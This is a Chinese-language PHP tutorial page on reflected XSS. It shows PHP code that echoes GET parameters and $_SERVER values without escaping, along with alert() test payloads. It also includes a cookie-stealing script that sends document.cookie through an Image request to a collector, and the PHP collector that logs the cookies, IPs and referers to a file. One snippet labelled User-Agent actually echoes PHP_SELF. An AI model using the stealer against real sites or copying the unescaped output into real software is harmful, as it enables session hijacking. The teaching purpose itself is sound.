XSS 反射型漏洞 · PHP学习 · 看云

企业🤖AI智能体构建引擎，智能编排和调试，一键部署，支持知识库和私有化部署方案广告

# XSS 反射型漏洞 **xss 漏洞大致分三种** - 反射型 XSS 漏洞 - 保存型 XSS 漏洞 - 基于 DOM 的 XSS 漏洞反射型 XSS 漏洞它通过给别人发送带有恶意脚本代码参数的 URL，当 URL 地址被打开时，特有的恶意代码参数被 HTML 解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接才能引起。一：变量的直接输出 ``` <pre class="calibre10">``` <span class="token1"><</span><span class="token1">?</span>php echo $_GET<span class="token3">[</span><span class="token2">'xss'</span><span class="token3">]</span><span class="token3">;</span> <span class="token1">?</span><span class="token1">></span> ``` ``` ``` <pre class="calibre10">``` <span class="token">//http://localhost/test/ddd.php?p=<script>alert(document.cookie);</script></span> <span class="token1"><</span><span class="token1">?</span>php echo $_GET<span class="token3">[</span><span class="token2">'p'</span><span class="token3">]</span><span class="token3">;</span> <span class="token1">?</span><span class="token1">></span> ``` ``` **二：$\_SERVER 变量参数** $\_SERVER\['PHP\_SELF'\] ``` <pre class="calibre10">``` <span class="token">//http://localhost/test/ddd.php/<script>alert(1111);</script></span> echo $_SERVER<span class="token3">[</span><span class="token2">'PHP_SELF'</span><span class="token3">]</span><span class="token3">;</span> ``` ``` $\_SERVER\['REQUEST\_URI'\] ``` <pre class="calibre10">``` <span class="token">//加上urldecode后就会有xss效果</span> echo <span class="token4">urldecode</span><span class="token3">(</span>$_SERVER<span class="token3">[</span><span class="token2">'REQUEST_URI'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">;</span> ``` ``` $\_SERVER\['HTTP\_USER\_AGENT'\] ``` <pre class="calibre10">``` <span class="token">//http://localhost/test/ddd.php?<script>alert(1111);</script></span> echo $_SERVER<span class="token3">[</span><span class="token2">'PHP_SELF'</span><span class="token3">]</span><span class="token3">;</span> <span class="token">//输出：Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0</span> ``` ``` 怎么让他输出xss？为了方便我们将下载浏览器插件辅助我们安装SIMPLE MODIFY HEADERS或者modify header value 插件 ![](https://img.kancloud.cn/12/79/1279d2abda6313ea88e8d455366474b7_1260x467.png) 再次访问http://localhost/test/ddd.php 即可看到弹窗；modify header value同理 ![](https://img.kancloud.cn/11/76/117620d2b8a47e1920079efaff7b76d1_1330x276.png) $\_SERVER\['HTTP\_REFERER'\] 三：http 请求格式 User-Agent: Referer **四：利用** 测试利用Cookie `<script>var i=new Image;i.src="http://127.0.0.1/xss.php?c="%2bdocument.cookie;</script>` 具体： ``` <pre class="calibre10">``` 访问： http<span class="token3">:</span><span class="token1">/</span><span class="token1">/</span>localhost<span class="token1">/</span>test<span class="token1">/</span>ddd<span class="token3">.</span>php<span class="token1">?</span>c<span class="token1">=</span><span class="token1"><</span>script<span class="token1">></span>var i<span class="token1">=</span><span class="token5">new</span> <span class="token4">Image</span><span class="token3">;</span>i<span class="token3">.</span>src<span class="token1">=</span><span class="token2">"http://localhost/test/xss.php?c="</span><span class="token1">%</span><span class="token6">2</span>bdocument<span class="token3">.</span>cookie<span class="token3">;</span><span class="token1"><</span><span class="token1">/</span>script<span class="token1">></span> <span class="token">//ddd.php</span> echo $_GET<span class="token3">[</span><span class="token2">'c'</span><span class="token3">]</span><span class="token3">;</span> <span class="token">//xss.php</span> $cookie<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'c'</span><span class="token3">]</span><span class="token3">;</span> $ip<span class="token1">=</span>getenv <span class="token3">(</span><span class="token2">'REMOTE_ADDR'</span><span class="token3">)</span><span class="token3">;</span> $time<span class="token1">=</span>date <span class="token3">(</span><span class="token2">"j F,Y, g: i a"</span><span class="token3">)</span><span class="token3">;</span> $referer<span class="token1">=</span>getenv <span class="token3">(</span><span class="token2">'HTP_REFERER'</span><span class="token3">)</span><span class="token3">;</span> $fp <span class="token1">=</span> fopen <span class="token3">(</span><span class="token2">'cook.txt'</span><span class="token3">,</span> <span class="token2">'a'</span><span class="token3">)</span><span class="token3">;</span> <span class="token4">fwrite</span><span class="token3">(</span>$fp<span class="token3">,</span> <span class="token2">'Cookie:'</span><span class="token3">.</span>$cookie<span class="token3">.</span><span class="token2">'<br> IP:'</span><span class="token3">.</span>$ip<span class="token3">.</span><span class="token2">'<br> Date and Time:'</span><span class="token3">.</span>$time<span class="token3">.</span><span class="token2">'<br> Referer:'</span><span class="token3">.</span>$referer<span class="token3">.</span><span class="token2">'<br><br><br>'</span><span class="token3">)</span><span class="token3">;</span> ``` ``` modify headers